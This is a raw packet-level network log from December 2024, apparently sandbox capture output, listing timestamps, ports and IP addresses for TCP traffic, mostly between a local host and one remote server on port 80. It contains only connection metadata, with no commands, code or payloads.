Dec 9, 2024 08:08:51.574213028 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.576987982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.577004910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.577056885 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.579957962 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.579971075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.580152035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.582828045 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.582839012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.584721088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.623317003 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.623341084 CET	443	49898	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:51.623930931 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.625706911 CET	49898	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.625722885 CET	443	49898	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:51.630244017 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:51.630254984 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:51.630379915 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:51.630481005 CET	49899	443	192.168.2.4	35.244.181.201
Dec 9, 2024 08:08:51.630492926 CET	443	49899	35.244.181.201	192.168.2.4
Dec 9, 2024 08:08:51.633886099 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.633918047 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:51.633990049 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.635610104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.636069059 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.636322975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.640291929 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.640302896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.641314030 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.642986059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.642998934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.643892050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.648305893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.648318052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.649019957 CET	49900	443	192.168.2.4	34.117.188.166
Dec 9, 2024 08:08:51.649029970 CET	443	49900	34.117.188.166	192.168.2.4
Dec 9, 2024 08:08:51.649758101 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.650966883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.650979042 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.654664040 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.656414032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.656424999 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.659207106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.659219027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.662614107 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.665009022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.665020943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.665338993 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.667628050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.667640924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.670094967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.672447920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.672466040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.674926996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.674938917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.677719116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.679757118 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.679966927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.679979086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.682054996 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.682266951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.682280064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.683161020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.686727047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.686738968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.688086033 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.688894987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.688915014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.689145088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.691447020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.691458941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.691791058 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.693708897 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.695142984 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.695903063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.698323011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.699328899 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.700885057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.702759981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.702836037 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.702902079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.705100060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.705144882 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.705228090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.709481001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.709498882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.709553003 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.711772919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.711841106 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.714044094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.714057922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.714101076 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.716308117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.720052958 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.720863104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.723072052 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.723155022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.723167896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.723304987 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.725604057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.725615025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.725651979 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.730279922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.730324030 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.730453968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.734728098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.734740973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.734755993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.734770060 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.734818935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.737637043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.737766027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.738250971 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.739377975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.741558075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.742255926 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.743757963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.743904114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.743915081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.744002104 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.746040106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.746161938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.747282982 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.750751019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.750762939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.750792980 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.752859116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.752871990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.757493973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.757507086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.757642031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.759756088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.759907961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.762120008 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.764374971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.766521931 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.766535044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.766546011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.768084049 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.768799067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.768811941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.773355961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.773369074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.775610924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.776807070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.776832104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.779035091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.779047966 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.780962944 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.781250000 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.781336069 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.781347990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.781359911 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.781446934 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.783627987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.783639908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.785904884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.785917997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.785928011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.788161993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.788197041 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.788208961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.789280891 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.789452076 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.827294111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.828241110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.828291893 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.828557014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.828568935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.828617096 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.830616951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.830630064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.832922935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.834949970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.834961891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.834999084 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.837229013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.837241888 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.839498997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.839510918 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.840919971 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.840976000 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.841805935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.844074011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.844086885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.845345020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.846344948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.848637104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.850949049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.850960970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.850970984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.851927996 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.853198051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.853210926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.853888988 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.857729912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.857742071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.860037088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.860049963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.862140894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.862154961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.864142895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.864811897 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.865010977 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.866142035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.866153955 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.866194010 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.868143082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.868199110 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.870145082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.870157003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.870198965 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.872160912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.872181892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.874099970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.874113083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.876523018 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.878063917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.878077030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.878115892 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.880054951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.880068064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.880078077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.881999016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.883143902 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.883959055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.885828972 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.885847092 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.886382103 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.887779951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.887830973 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.889724016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.889740944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.890345097 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.891588926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.891602039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.893527031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.893538952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.894026041 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.897325039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.897346973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.897356987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.897478104 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.899220943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.899234056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.901125908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.902534008 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.903052092 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.904953003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.904966116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.906783104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.908705950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.908718109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.910618067 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.910629988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.912463903 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.912477016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.915333033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.915344000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.917139053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.917150974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.917797089 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.918047905 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.918379068 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.920861959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.920881033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.922681093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.922693014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.924542904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.924555063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.926429033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.927750111 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.928256035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.928268909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.930075884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.930100918 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.932001114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.932013035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.933300972 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.933806896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.933819056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.933885098 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.935661077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.935673952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.935991049 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.939357996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.939400911 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.939444065 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.941234112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.941246033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.941565037 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.943073034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.945003033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.945014954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.945190907 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.946787119 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.946799040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.947391987 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.948638916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.948687077 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.950484037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.950495958 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.950530052 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.952325106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.952344894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.952382088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.956043959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.956984043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.957005978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.957024097 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.984188080 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:51.984318018 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:52.018706083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.019139051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.019959927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.020817995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.021645069 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.021656036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.023382902 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.023394108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.024957895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.024970055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.026616096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.026632071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.027013063 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.028269053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.028280973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.029925108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.029937029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.031574011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.031585932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.033241987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.033253908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.034590960 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.034677029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.034737110 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.035038948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.035043955 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.035229921 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.036834955 CET	80	49886	185.215.113.16	192.168.2.4
